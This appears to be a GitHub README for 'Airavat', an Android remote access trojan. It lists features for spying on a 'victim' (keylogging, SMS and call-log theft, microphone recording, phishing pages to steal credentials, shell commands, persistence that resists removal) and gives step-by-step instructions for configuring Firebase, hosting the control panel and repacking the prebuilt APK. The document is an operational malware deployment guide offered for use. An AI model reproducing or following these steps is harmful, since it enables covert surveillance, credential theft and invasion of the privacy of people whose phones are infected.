

- Read all the files of Internal Storage
 - · Download Any Media to your Device from Victims Device
 - · Get all the system information of Victim Device
 - · Retrieve the List of Installed Applications

- Retrive SMS
- · Retrive Call Logs
- Retrive Contacts
- Send SMS
- · Gets all the Notifications
- Keylogger
- Admin Permission
- Show Phishing Pages to steal credentials through notification.
 - o Steal credentials through pre built phishing pages
 - o Open any suspicious website through notification to steal credentials.
- · Record Audio through Mic
- · Play music in Victim's device
- Vibrate Device
- · Text To Speech
- Turn On/Off Torch Light
- · Change Wallpaper
- Run shell Commands
- Get Clipboard text (Only When app's Activity is visible)
- Launch Any URL (Only When app's Activity is visible)
- · Runs In Background
 - o Auto Starts on restarting the device
 - o Auto Starts when any notification arrives
 - o Accepts name and photo changes
- The victim cannot simply delete it
- No port forwarding needed

AIRAVAT

© Prateek Chaubey



Dump SMS



Call Logs



My Files



Apps List



Sys Info



Toast



Contacts



Play Music



Send SMS



Shell



Vibrator



TTS



Keylogger



Wallpaper



Notifications



PhishData



Scams



Recordings



ClipBoard



Torch



URL

→ Firebase Account

- ApkEasy Tool (For PC)
- apkeditor (for Android)

How to Build

∂ Firebase Setup

- 1. Create an Firebase Account and afterwords create a new project with any name.
- 2. Enable Firebase Database and Firebase Storage.
- 3. In Firebase Database Click on the rules and set .read and .write to true

```
o {
    "rules": {
        ".read": "true",
        ".write": "true"
    }
}
```

4. In Firebase Storage allow reads and writes for all paths.

```
o rules_version = '2';
service firebase.storage {
  match /b/{bucket}/o {
    match /{allPaths=**} {
      allow read, write
    }
  }
}
```

- 5. Now Go to project overview and create an Android App and download the google-services.json file.
- 6. Also create a web app and copy the config of webapp.

Panel Setup

- 1. You can use Github Pages, Firebase Hosting or any hosting site or com.phlox.simpleserver.apk to host the board.
- 2. Open <u>index.html</u> File and from <u>line number 16</u> replace the config with your web app config which you have created on Step 6.
- 3. Save the file, Your Panel Setup is completed.

- 1. Install the application Simple HTTP Server
- 2. Edit the Root folder path within the application to the WEB PANEL location
- 3. Click START, then click 127.0.0.1 Go to any browser and paste the url And start

Android RAT

Download <u>System.apk</u>

- 1. Unpack or edit the apk using any software recommended above.
- 2. Now open res/values/strings.xml file.
- 3. Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id
- 4. with your Firebase Account using <code>google-services.json</code> file which you have downloaded on step 5 from the Firebase Setup stage
 - Example

```
<string name="firebase_database_url">https://your_databaseURL.firebase.com</string>
<string name="google_api_key">your_apiKey</string>
<string name="google_app_id">your_appId</string>
<string name="google_storage_bucket">your_storageBucket</string>
<string name="project_id">your_projectId</string></string></string>
```

- 5. After saving the changes, in the strings.xml file
- 6. Click on Smali
- 7 Click on the key sign that means only assembly 0 Compile /sign the only file

Releases

No releases published

Sponsor this project



prateek-chaubey Prateek Chaubey



Sponsor

Learn more about GitHub Sponsors

Packages

No packages published

Languages

• **HTML** 100.0%